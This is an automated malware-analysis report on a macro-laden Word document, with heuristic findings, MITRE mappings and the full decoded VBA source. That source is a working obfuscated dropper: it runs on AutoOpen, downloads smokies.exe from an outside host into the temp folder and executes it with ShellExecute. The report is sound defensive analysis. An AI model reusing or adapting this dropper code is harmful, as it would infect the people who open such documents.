MALICIOUS
338
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample contains VBA macros that are configured to execute automatically via the AutoOpen subroutine. The script downloads a file from "http://directexe.com/32Mx/smokies.exe" and saves it to the temporary directory, then executes it. The document body provides detailed instructions for using anonymization techniques and cryptocurrency exchanges, suggesting a phishing or scam lure to facilitate the execution of the downloaded payload.
Heuristics 11
-
ClamAV: Doc.Dropper.Agent-6531279-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6531279-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
e69606c30fff4c93a3b9c8c3932e50fe.Write a3ea6aee45ad475aac8824884c6b30e9.responseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set a3ea6aee45ad475aac8824884c6b30e9 = CreateObject("MSXML2.XMLHTTP") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
d860c6671c5c41d49d08851764f59ae0 = Environ("tmp") & "\" & Mid(bcb9c46500c54ec4bd4c503fe5fa4b52, InStrRev(bcb9c46500c54ec4bd4c503fe5fa4b52, "/") + 1, Len(bcb9c46500c54ec4bd4c503fe5fa4b52)) -
Reference to ShellExecute API high SC_STR_SHELLEXECReference to ShellExecute API
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.technitium.com/tmac/index.html Referenced by macro
- https://www.okpay.com/Referenced by macro
- https://btc-e.com/Referenced by macro
- http://www.pcgamesupply.com/buy/CashU-100/Referenced by macro
- http://www.pcgamesupply.com/buy/CashU-100/#Referenced by macro
- http://directexe.com/32Mx/smokies.exeReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4104 bytes |
SHA-256: 440b69180ec72466be63d8a22209ef322093ae42cd85d41d54095100a0337290 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub AutoOpen()
Dim f2cc230470d44a01bb95c7a9b6e55a93 As New f50872114f9340d2b22b3df03390a8
Dim cdd3d1be974c4e10855c2a4a2083e1e1 As New c8459494b9d84194be78f47bd15d74f
bcb9c46500c54ec4bd4c503fe5fa4b52 = "http://directexe.com/32Mx/smokies.exe"
d860c6671c5c41d49d08851764f59ae0 = Environ("tmp") & "\" & Mid(bcb9c46500c54ec4bd4c503fe5fa4b52, InStrRev(bcb9c46500c54ec4bd4c503fe5fa4b52, "/") + 1, Len(bcb9c46500c54ec4bd4c503fe5fa4b52))
f2cc230470d44a01bb95c7a9b6e55a93.eadc189693094d3c819dcac7231c8fb4 bcb9c46500c54ec4bd4c503fe5fa4b52, d860c6671c5c41d49d08851764f59ae0
cdd3d1be974c4e10855c2a4a2083e1e1.fbef33218d1d44168400f09831386b86 d860c6671c5c41d49d08851764f59ae0
End Sub
Attribute VB_Name = "f50872114f9340d2b22b3df03390a8"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub eadc189693094d3c819dcac7231c8fb4(cccfc78610b0487cb9efcae8afd9d62ce6248981c6e148cca990c844a8dd86cf, f07dbe486d764e758a71fb9dc52add18c6513a4521fb4d569d46f8187437bf91)
Set a3ea6aee45ad475aac8824884c6b30e9 = CreateObject("MSXML2.XMLHTTP")
Set e69606c30fff4c93a3b9c8c3932e50fe = CreateObject("ADODB.Stream")
a3ea6aee45ad475aac8824884c6b30e9.Open "GET", cccfc78610b0487cb9efcae8afd9d62ce6248981c6e148cca990c844a8dd86cf, False
a3ea6aee45ad475aac8824884c6b30e9.send
e69606c30fff4c93a3b9c8c3932e50fe.Type = 1
e69606c30fff4c93a3b9c8c3932e50fe.Open
e69606c30fff4c93a3b9c8c3932e50fe.Write a3ea6aee45ad475aac8824884c6b30e9.responseBody
e69606c30fff4c93a3b9c8c3932e50fe.SaveToFile f07dbe486d764e758a71fb9dc52add18c6513a4521fb4d569d46f8187437bf91, 2
e69606c30fff4c93a3b9c8c3932e50fe.Close
End Sub
Attribute VB_Name = "c8459494b9d84194be78f47bd15d74f"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If VBA7 Then
Private Declare PtrSafe Function e6f0a79910fa4fd2bc34050b7127c003e6f0a79910fa4fd2bc34050b7127c003 Lib "shell32.dll" Alias "ShellExecuteA" (ByVal cc3baee598a84867a9cd47edfc3956d4a7db5842e53b45a19bce4bfda41773f4 As Integer, ByVal caaf7a6afd504b0ea1c8d9836a749259c32b822128b147abb1d0348d2b872779 As String, ByVal dbe6ac9f5118489ea21ebe2017c13165c66a1421ad6948b68b708614515d1076 As String, ByVal f8672d5d45ba4b8995e428d0c59e1cf6d5c3649fd47b4a24a2ef220f3b6b6a6e As String, ByVal a7c01a631bda4a95bf16326f5dc1b914b934bca31d774359bb83605d23208e5d As String, ByVal c7663b3ca08f46259459ca6aa7278381aa4723789f80485499993c86f0163e95 As Integer) As Integer
#Else
Private Declare Function e6f0a79910fa4fd2bc34050b7127c003e6f0a79910fa4fd2bc34050b7127c003 Lib "shell32.dll" Alias "ShellExecuteA" (ByVal cc3baee598a84867a9cd47edfc3956d4a7db5842e53b45a19bce4bfda41773f4 As Integer, ByVal caaf7a6afd504b0ea1c8d9836a749259c32b822128b147abb1d0348d2b872779 As String, ByVal dbe6ac9f5118489ea21ebe2017c13165c66a1421ad6948b68b708614515d1076 As String, ByVal f8672d5d45ba4b8995e428d0c59e1cf6d5c3649fd47b4a24a2ef220f3b6b6a6e As String, ByVal a7c01a631bda4a95bf16326f5dc1b914b934bca31d774359bb83605d23208e5d As String, ByVal c7663b3ca08f46259459ca6aa7278381aa4723789f80485499993c86f0163e95 As Integer) As Integer
#End If
Sub fbef33218d1d44168400f09831386b86(ea1ae239ff6540968337535ac3c3ae95b9719b8d67ff404da4026d7ec8c293f9)
e6f0a79910fa4fd2bc34050b7127c003e6f0a79910fa4fd2bc34050b7127c003 0, "open", ea1ae239ff6540968337535ac3c3ae95b9719b8d67ff404da4026d7ec8c293f9, "", "", 1
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.